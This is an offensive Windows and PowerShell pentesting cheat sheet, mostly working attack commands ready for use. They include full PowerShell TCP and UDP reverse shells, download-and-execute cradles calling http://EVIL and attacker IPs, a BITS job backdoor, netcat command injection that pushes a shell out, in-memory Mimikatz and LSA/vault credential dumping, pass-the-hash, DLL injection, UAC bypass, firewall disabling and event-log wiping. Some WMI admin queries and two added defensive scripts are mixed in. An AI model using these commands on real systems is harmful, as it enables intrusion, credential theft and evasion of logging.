PowerShell Commands
Windows Commands
- Powershell with the Windows API
- .Net Enumeration and Reflection
- Low-Level Windows API Access From PowerShell
Integrate Linux Commands into Windows with PowerShell and the Windows Subsystem for Linux
Collection Of Powershell Scripts with Framework for Pentesting
SHiPS based provider to navigate CIM classes and namespaces
Hidden WIFI backdoor:
netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<password> keyUsage=[persistent|temporary]
netsh wlan [start|stop] hostednetwork
Allow a program/service/port through the firewall:
netsh firewall set service type = remotedesktop mode = enable
netsh firewall add allowedprogram C:\nltest.exe mltest enable
netsh firewall add portopening tcp 2482 lt enable all
Tunnel traffic natively with Windows (portproxy; the parameter is connectaddress, not connecthost):
netsh interface portproxy add v4tov4 listenport=80 connectaddress=[AttackerIP] connectport=80
List other shares:
net view \\fileserv /all
PowerShell downloader:
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"
Download and run a program (run from cmd.exe so that %TEMP% is expanded before PowerShell sees it):
powershell (new-object System.Net.WebClient).DownloadFile('http://rmccurdy.com/scripts/quickvnc.exe','%TEMP%\quickvnc.exe');Start-Process "%TEMP%\quickvnc.exe"
Wipe event logs (the log name must reach wevtutil unquoted so that $_ expands):
powershell -command "wevtutil el | Foreach-Object {Write-Host ('Clearing ' + $_); wevtutil cl $_}"
Get external IP:
powershell -command "(Resolve-DnsName -Name myip.opendns.com -Server 208.67.222.220).IPAddress"
Bitsadmin Download/Exec
Make the backdoor (a BITS job that runs the downloaded file once the transfer completes; /SETMINRETRYDELAY takes the job name first):
bitsadmin /create backdoor
bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe
bitsadmin /SETMINRETRYDELAY backdoor 88000
bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL
Check that the backdoor is set up correctly:
bitsadmin /getnotifycmdline backdoor
bitsadmin /listfiles backdoor
Run the backdoor:
bitsadmin /RESUME backdoor
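As an added defender-side check (not part of the original page), the PowerShell below lists BITS jobs that carry a notification command line, which is exactly what the /SETNOTIFYCMDLINE step above configures. It assumes the BitsTransfer module is available, reads the NotifyCmdLine and FileList properties of the returned BitsJob objects, and runs from an elevated prompt so that -AllUsers can see other accounts' jobs; the function name is mine.

```powershell
# Added example: enumerate BITS jobs for all users and report the ones that
# will run a program on completion or error (NotifyCmdLine set). Requires an
# elevated prompt for -AllUsers.
Import-Module BitsTransfer

function Get-SuspiciousBitsJob {
    [CmdletBinding()]
    param()
    Get-BitsTransfer -AllUsers | ForEach-Object {
        $job = $_
        # NotifyCmdLine is a string array: the program, then its argument string.
        $cmd = ($job.NotifyCmdLine | Where-Object { $_ }) -join ' '
        if (-not $cmd) { return }   # no notification command: ordinary transfer
        # Show what the job fetches, so the analyst sees the dropped file.
        $files = ($job.FileList | ForEach-Object {
            "$($_.RemoteName) -> $($_.LocalName)"
        }) -join '; '
        [PSCustomObject]@{
            DisplayName       = $job.DisplayName
            Owner             = $job.OwnerAccount
            State             = $job.JobState
            MinimumRetryDelay = $job.MinimumRetryDelay   # large values hint at a deliberately slow job
            NotifyCmdLine     = $cmd
            Files             = $files
        }
    }
}

Get-SuspiciousBitsJob | Format-List
```

From cmd.exe, `bitsadmin /list /allusers /verbose` shows the same fields, including NOTIFICATION COMMAND LINE, for every job.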
WMI Commands
Spot Odd Executables - wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath
Look at services that are set to start automatically - wmic SERVICE WHERE StartMode="Auto" GET Name, State
Find user-created shares (usually not hidden) - wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path
Find stuff that starts on boot - wmic STARTUP GET Caption, Command, User
Identify any local system accounts that are enabled (guest, etc.) - wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name
Change Start Mode of Service - wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled
Number of Logons Per USERID - wmic netlogin where (name like "%skodo") get numberoflogons
Obtain a Certain Kind of Event from Eventlog - wmic ntevent where (message like "%logon%") list brief
Clear the Eventlog (Security example) - wmic nteventlog where (description like "%secevent%") call cleareventlog
Get MAC Address - wmic nic get macaddress
Reboot or Shutdown - wmic os where buildnumber="2600" call reboot
Update static IP address - wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")
Change network gateway - wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)
Enable DHCP - wmic nicconfig where index=9 call enabledhcp
Service Management - wmic service where caption="DHCP Client" call changestartmode "Disabled"
Start an Application - wmic process call create "calc.exe"
Terminate an Application - wmic process where name="calc.exe" call terminate
Change Process Priority - wmic process where name="explorer.exe" call setpriority 64
Get List of Process Identifiers - wmic process where (Name='svchost.exe') get name,processid
Information About Harddrives - wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber
Information about OS - wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:\osinfo.htm
Information about files (backslashes are doubled inside WQL strings) - wmic path cim_datafile where "Path='\\windows\\system32\\wbem\\' and FileSize>1784088" > c:\wbemfiles.txt
Process list - wmic process get /format:htable > c:\process.htm
Retrieve list of warning and error events not from the System or Security logs - WMIC NTEVENT WHERE "EventType<3 AND LogFile != 'System' AND LogFile != 'Security'" GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:"htable.xsl":"datatype=number":"sortby=EventType" > c:\appevent.htm
Total Hard Drive Space Check - wmic LOGICALDISK LIST BRIEF
Get Running Services Information - wmic service where (state="running") get caption, name, startmode, state
Get Startmode of Services - wmic service get caption, name, startmode, state
Get Domain Names And When Account PWD set to Expire - WMIC UserAccount GET name,PasswordExpires /Value
Get Hotfix and Security Patch Information - WMIC QFE GET /format:CSV > QFE.CSV
Get Startup List - wmic startup list full
Find a specific Process - wmic process list brief | find "cmd.exe"
Get List of IP Interfaces - wmic nicconfig where IPEnabled='true'
Change IP Address - wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0")
OS/System Report HTML Formatted - wmic /output:c:\os.html os get /format:hform
Products/Programs Installed Report HTML Formatted - wmic /output:c:\product.html product get /format:hform
Services Report on a Remote Machine HTML Formatted - wmic /output:c:\services.htm /node:server1 service list full /format:htable
Turn on Remote Desktop Remotely - wmic /node:"servername" /user:"user@domain" /password:"password" RDToggle where ServerName="servername" call SetAllowTSConnections 1
Get Server Drive Space Usage Remotely (inside a batch for loop, %%A holds the host name) - WMIC /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv | MORE /E +2 >> SRVSPACE.CSV
Get PC Serial Number - wmic /node:"HOST" bios get serialnumber
Get PC Product Number - wmic /node:"HOST" baseboard get product
Get Services for Remote Machine in HTML Format - wmic /output:c:\services.htm /node:server1 service list full /format:htable
Search for Stored Credentials
Metasploit Framework enum_unattend module and gather credentials (GPP) module:
- http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
- http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /S pass *.txt *.xml *.ini    // run from C:\
#find out what groups a user is part of
net user <userName> /domain | find "Group"
Users and Permissions
Add a user on Windows:
net user $username $password /add
Add a user to the "Remote Desktop Users" group:
net localgroup "Remote Desktop Users" $username /add
Make a user an administrator:
net localgroup administrators $username /add
Network
Disable Windows Firewall on newer versions:
netsh advfirewall set allprofiles state off
Disable Windows Firewall on older Windows:
netsh firewall set opmode disable
Port forwarding to a remote host:
netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>
Wireless backdoor creation:
netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=[persistent|temporary]
netsh wlan [start|stop] hostednetwork
Dump DNS zones (the cmdlet in the DnsServer module is Get-DnsServerResourceRecord; there is no Get-DnsRecord):
Get-DnsServerResourceRecord -RRType A -ZoneName <FQDN> -ComputerName <ServerName> | ForEach-Object { Add-Content -Value $_ -Path filename.txt }
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_AType WHERE ContainerName='domain.com'"
Pass the Hash Windows
pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe
The part after % is the LM:NT hash pair, passed in place of the password.
"aad3b435b51404eeaad3b435b51404ee" is the blank LM hash.
Pass the Hash with impacket's wmiexec:
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE alice@localhost
Exec commands on a remote Windows machine:
PsExec.exe \\10.11.1.49 -u alice -p somepasswd cmd
Get a file from Kali to the remote Windows machine:
TFTP.EXE -i 10.11.1.49 get PsExec64.exe
Remote port forwarding from Windows -> Kali (the SSH host argument was missing; <KaliIP> is a placeholder):
plink.exe -l root -pw Parolaroot -R 445:127.0.0.1:445 <KaliIP>
Redirect port with plink.exe:
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185
## -R opens port 445 on the Kali side (192.168.12.185) and tunnels it, over SSH on port 22, to 127.0.0.1:445 on the Windows host
SYSINTERNALS
Use -accepteula to avoid the GUI prompt asking to accept the EULA:
PsExec.exe -accepteula
PsExec64.exe -accepteula \\10.11.1.49 -u user -p somepassword cmd
powershell -ExecutionPolicy Bypass C:\Users\Public\PsExec.exe -accepteula \\localhost -u alice -p XXXX cmd
- PsExec - execute processes remotely
- PsFile - shows files opened remotely
- PsGetSid - display the SID of a computer or a user
- PsInfo - list information about a system
- PsPing - measure network performance
- PsKill - kill processes by name or process ID
- PsList - list detailed information about processes
- PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
- PsLogList - dump event log records
- PsPasswd - changes account passwords
- PsService - view and control services
- PsShutdown - shuts down and optionally reboots a computer
- PsSuspend - suspends processes
- PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)
Windows Persistence
Add a Windows user:
net user /add hacker 1234567
Add the user to the Administrators group:
net localgroup administrators /add hacker
Add the user to the Remote Desktop Users group:
net localgroup "Remote Desktop Users" hacker /add
Start the Remote Desktop service:
net start TermService
Is the Remote Desktop service running?
tasklist /svc | findstr /C:TermService
Permanently enable Terminal Services (sc needs the space after "start="):
sc config TermService start= auto
Enable Terminal Services through the registry // reboot after
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
DLL Injection
Run a custom DLL:
rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
Run CMD when disabled:
rundll32 C:\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\cmd.dll
Run Regedit:
rundll32 C:\regedit.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\regedit.dll
Inject a DLL into a running process
Remote DLL Injector:
RemoteDLLInjector64.exe <ProcessID> <DLL file>
Using PowerSploit:
Invoke-DLLInjection -ProcessID <ProcessID> -Dll <DLLfile>
Using Windows executables:
Mavinject32.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject64.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject.exe <PID> /INJECTRUNNING <DLL PATH>
InstallUtil.exe /U <DLL PATH>
UAC Bypass
Bypass with Windows Installer (removed in Windows 10):
makecab C:\Some\Evil.dll C:\Some\Suspicious.cab
wusa C:\Some\Suspicious.cab /extract:C:\Windows\Some\Path
Bypass with the IFileOperation COM object (pseudocode for the two calls involved):
IFileOperation.MoveItem("C:\Some\Source.file","C:\Some\Destination\Path\","Destination.file")
IFileOperation.PerformOperations()
Binary Information
Which programs have autoElevate privileges (look for the manifest string in the binary):
Get-Content -Path C:\Windows\System32\Taskmgr.exe | Select-String -Pattern "autoElevate"
View all in a folder (Get-AutoElevate is a custom function, not a built-in cmdlet):
Get-AutoElevate -Path C:\Windows\System32 -MaxDepth 1
Domain Information
Finding the Domain Controller:
echo %LOGONSERVER%
nltest /dclist:<domain>
nslookup -q=srv _kerberos._tcp
(the domain suffix can autocomplete)
Setting up a Domain Server
Install Active Directory:
Install-WindowsFeature -name AD-Domain-Services -IncludeManagementTools
Create a new Active Directory Domain:
Import-Module ADDSDeployment
#Initiate the new Active Directory:
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2012R2" `
-DomainName "raymii.nl" -DomainNetbiosName "RAYMII" -ForestMode "Win2012R2" -InstallDns:$true `
-LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true
Add a server to a domain:
#First test the existing domain to make sure you can join:
Test-ADDSForestInstallation -DomainName raymii.nl
#Add the server to the domain as a backup domain controller:
Install-ADDSDomainController -InstallDns -Credential (Get-Credential RAYMII\Administrator) -DomainName raymii.nl
Create an Active Directory user account:
New-ADUser -Name "John Doe" -GivenName John -Surname Doe `
-SamAccountName jdoe -UserPrincipalName jdoe@raymii.nl `
-AccountPassword (Read-Host -AsSecureString "hunter2") `
-PassThru | Enable-ADAccount
Create an Active Directory group:
#Use the below command to create a new global group in the default Users folder of Active Directory called "Managers":
New-ADGroup -name "Managers" -groupscope Global
#If it needs to exist in different path in Active Directory, specify the path by its distinguished name:
New-ADGroup -name "Managers" -groupscope Global -path "OU=OtherOU,DC=Raymii,DC=nl"
Add user to a group:
#The below command adds the user jdoe to the Managers group:
Add-ADGroupMember -Identity "Managers" -Member "jdoe"
#To add a user in a different OU to a group in a different OU, you can specify the full DN:
Add-ADGroupMember -Identity "CN=SupportSlavesGroup,OU=SupportSlaves,DC=raymii,DC=nl" -Members "CN=jdoe,OU=OtherUserOU,DC=raymii,DC=nl"
Install Microsoft Exchange 2013:
#Install the RSAT-DSS role via Powershell:
Install-WindowsFeature RSAT-ADDS
#We prepare the forest for the installation of Exchange. First the Schema:
setup /ps /IAcceptExchangeServerLicenseTerms
#The Active Directory:
setup /PrepareAD /OrganizationName:"Raymii" /IAcceptExchangeServerLicenseTerms
#The Domain itself:
setup /pd /IAcceptExchangeServerLicenseTerms
#Install other required components and features for Exchange:
Install-WindowsFeature AS-HTTP-Activation, Desktop-Experience, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation
#You need to download and install the following setups manually from the Microsoft website and install them in the order listed below:
# Unified Communications Managed API 4.0 Runtime
# Microsoft Office 2010 Filter Pack 64 bit
# Microsoft Office 2010 Filter Pack SP1 64 bit
#Start the actual Exchange installation:
setup /m:Install /Roles:ca,mb,mt /IAcceptExchangeServerLicenseTerms /InstallWindowsComponents /DBFilePath:"E:\EXCHANGE\MDB001.edb" /LogFolderPath:"E:\EXCHANGE" /MdbName:"MDB001"
WebDL and execute
powershell -ExecutionPolicy Bypass -noLogo -Command Import-Module BitsTransfer;Start-BitsTransfer http://www.illmob.org/test.exe test.exe;./test.exe;
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://illmob.org/test.exe','test.exe');./test.exe
powershell -ExecutionPolicy Bypass -noLogo -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
Reverse TCP Shell (192.168.1.100 and 4444 are the listener address and port)
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Reverse UDP Shell (192.168.1.100 is the listener address)
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("192.168.1.100"),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()
WebDL and execute mimikatz totally in memory
Uses Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory and dump credentials without ever writing the mimikatz binary to disk. Dump all domain creds with mimikatz:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
Invoke-Mimikatz.cs.ps1 invokes x86 or x64 Mimikatz inside the PowerShell process:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/BD2toB'); Invoke-Mimikatz -DumpCreds"
WebDL and execute hashdump totally in memory
Hashes are dumped using a modified version of the powerdump script from MSF written by David Kennedy. Administrator privileges are required for this script.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/MHa1Bj'); Get-PassHashes"
WebDL and execute Get-VaultCredential totally in memory
Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically, are displayed in cleartext.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/57uScy'); Get-VaultCredential"
WebDL and execute LSA Secrets totally in memory
Extracts LSA secrets from HKLM:\SECURITY\Policy\Secrets\ on the local computer. The payload must be run with elevated permissions, in 32-bit mode, and requires permissions to the SECURITY key in HKLM. That permission can be obtained by using the Enable-DuplicateToken payload.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/qhgsX1');"
Dump stored Autologon password
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | select defaultusername,defaultpassword
Dump WIFI Passwords
$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
$exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
foreach($profil in (netsh wlan show profiles | Select-String ':')){foreach($line in (netsh wlan show profiles name=($profil.toString().split(':')[1].trim()) key=clear)){$line+';'}};
SID2USER
((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).Translate([System.Security.Principal.NTAccount])).Value
USERS2SID & Last Logon
gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
Query Domain Admins
Get-ADGroupMember -Credential $cred -Server pwnt.com "Domain Admins"
Query Process/Service
gps | ?{$_.name -match "<process/service name>"} | ?{$_.id -match "<process/service id>"} | select *
Query Drives
[System.IO.DriveInfo]::GetDrives()
WebInject callback
127.0.0.1 | powershell.exe (new-object System.Net.WebClient).Downloadfile('http://192.168.1.107/nc.exe', 'nc.exe')
Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:
127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21
Port Scan
PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
Ping Sweep
PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl}
Find Files
PS C:\> Get-ChildItem "C:\Users\" -Recurse -Include *passwords*.txt
Text 2 Speech
powershell (New-Object -ComObject Sapi.SpVoice).Speak(('All Your Base R Belong To Us.'))
Other Resources: [Nishang Github](https://github.com/samratashok/)
Download Cradles
from [https://gist.github.com/HarmJ0y/bb48307ffa663256e239](https://gist.github.com/HarmJ0y/bb48307ffa663256e239)
```powershell
# 1. normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# 2. PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# 3. hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# 4. Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# 5. WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# 6. using bitstransfer - touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
# 7. DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#    the code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
# 8. from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
```
Using Microsoft's SyncAppvPublishingServer to download and execute a PowerShell file
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('{}') | IEX"
Passing an msi file URL to the Windows Installer will download and execute it
msiexec /i {}
Windows Remote Management provides the ability to remotely execute WMI commands
winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}
Uses certutil to download your base64 encoded DLL file as a .txt file to avoid suspicion
certutil -urlcache -split -f {} google_https_cert.txt && certutil -decode google_https_cert.txt https_cert.dll && regsvr32 /s /u https_cert.dll
Uses certutil to download your exe file as a cert file to avoid suspicion
certutil.exe -urlcache -split -f {} google_https_cert.exe && google_https_cert.exe
Using the Windows Control Panel to load a DLL file
control.exe {your_dll_file}
Using the .NET compiler to compile a C# payload locally that can then be executed
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}
Uses forfiles to execute commands without using cmd
forfiles /p c:\windows\system32 /m notepad.exe /c {Here_your_command}
Uses the mshta command to download and execute your hta file
mshta {}
Using Microsoft Office Word to load a DLL file
winword /l {your_dll_file}
Using rundll32.exe to download and execute a PowerShell file
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{}');")
Search for vulnerable service privilege opportunities using the PowerUp script from PowerTools
Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
PowerView and output locally to disk for beacon ("-no" alone is ambiguous to powershell.exe, so -nop is used):
powershell -nop -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter USRNAME | Out-File -Encoding Ascii USERNAME.txt}"
PowerView user hunting, search by keyword:
powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Property samaccountname,description,title
powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Property samaccountname,description,title
Simple web request (proxy-aware, with a browser User-Agent):
powershell.exe -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'); $wc.proxy = [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.downloadstring('http://google.com/')
List Chrome bookmarks with one line:
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
List all unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
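As an added example that is not part of the original page, the PowerShell below performs the same unquoted-path check through CIM and adds the remediation: Get-UnquotedServicePath reports services whose unquoted binary path contains a space before the executable (excluding the Windows directory, as the wmic one-liner does), and Repair-UnquotedServicePath rewrites the service's ImagePath registry value with quotes. Both function names are mine; the repair needs an elevated prompt and honours -WhatIf.

```powershell
# Added example: find services with unquoted binary paths containing spaces,
# and optionally fix them by quoting the executable part of ImagePath.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Skip empty paths and paths that are already quoted.
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { return }
        # Only the part up to and including ".exe" matters; arguments after it
        # cannot cause the search-order problem.
        $i   = $path.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        $exe = if ($i -ge 0) { $path.Substring(0, $i + 4) } else { $path }
        if ($exe -notmatch ' ') { return }
        # Binaries under the Windows directory are excluded, as in the wmic one-liner.
        if ($exe -like "$env:SystemRoot\*") { return }
        [PSCustomObject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            State     = $_.State
            PathName  = $path
            ExePath   = $exe
        }
    }
}

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Objects produced by Get-UnquotedServicePath.
        [Parameter(Mandatory, ValueFromPipeline)] $Service
    )
    process {
        # Keep any arguments that followed the executable, unchanged.
        $tail  = $Service.PathName.Substring($Service.ExePath.Length)
        $fixed = '"' + $Service.ExePath + '"' + $tail
        $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Service.Name)"
        if ($PSCmdlet.ShouldProcess($Service.Name, "set ImagePath to $fixed")) {
            # Same value that "sc config <name> binPath= ..." writes.
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
        }
    }
}

Get-UnquotedServicePath | Format-Table -AutoSize
# Preview the change first; rerun without -WhatIf to apply it.
Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```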
Firewall
netsh advfirewall show state
netsh advfirewall show config
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Exploit" dir=in action=allow program="C:\exploit.exe" enable=yes
netsh firewall add portopening tcp 2482 lt enable all
Services
schtasks /query /fo LIST /v
tasklist /SVC
sc qc Spooler
Enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Add Admin User
net user [username] [password] /add
net localgroup administrators [username] /add
Dump WIFI passwords to .xml
netsh wlan export profile key=clear
Dump WIFI SSID/Password one-liner
@echo off & for /f "tokens=1* delims=:" %a in ('netsh wlan show profiles') do (for /f "tokens=*" %c in ("%~b") do netsh wlan show profile name=%c key=clear) | findstr /c:"Key Content" /c:"SSID name"
OS Name and Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Transfer File from FTP
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
Transfer File from TFTP
tftp -i yourserver.com get yourfile.exe && start yourfile.exe
Transfer File from ADODB Stream Files
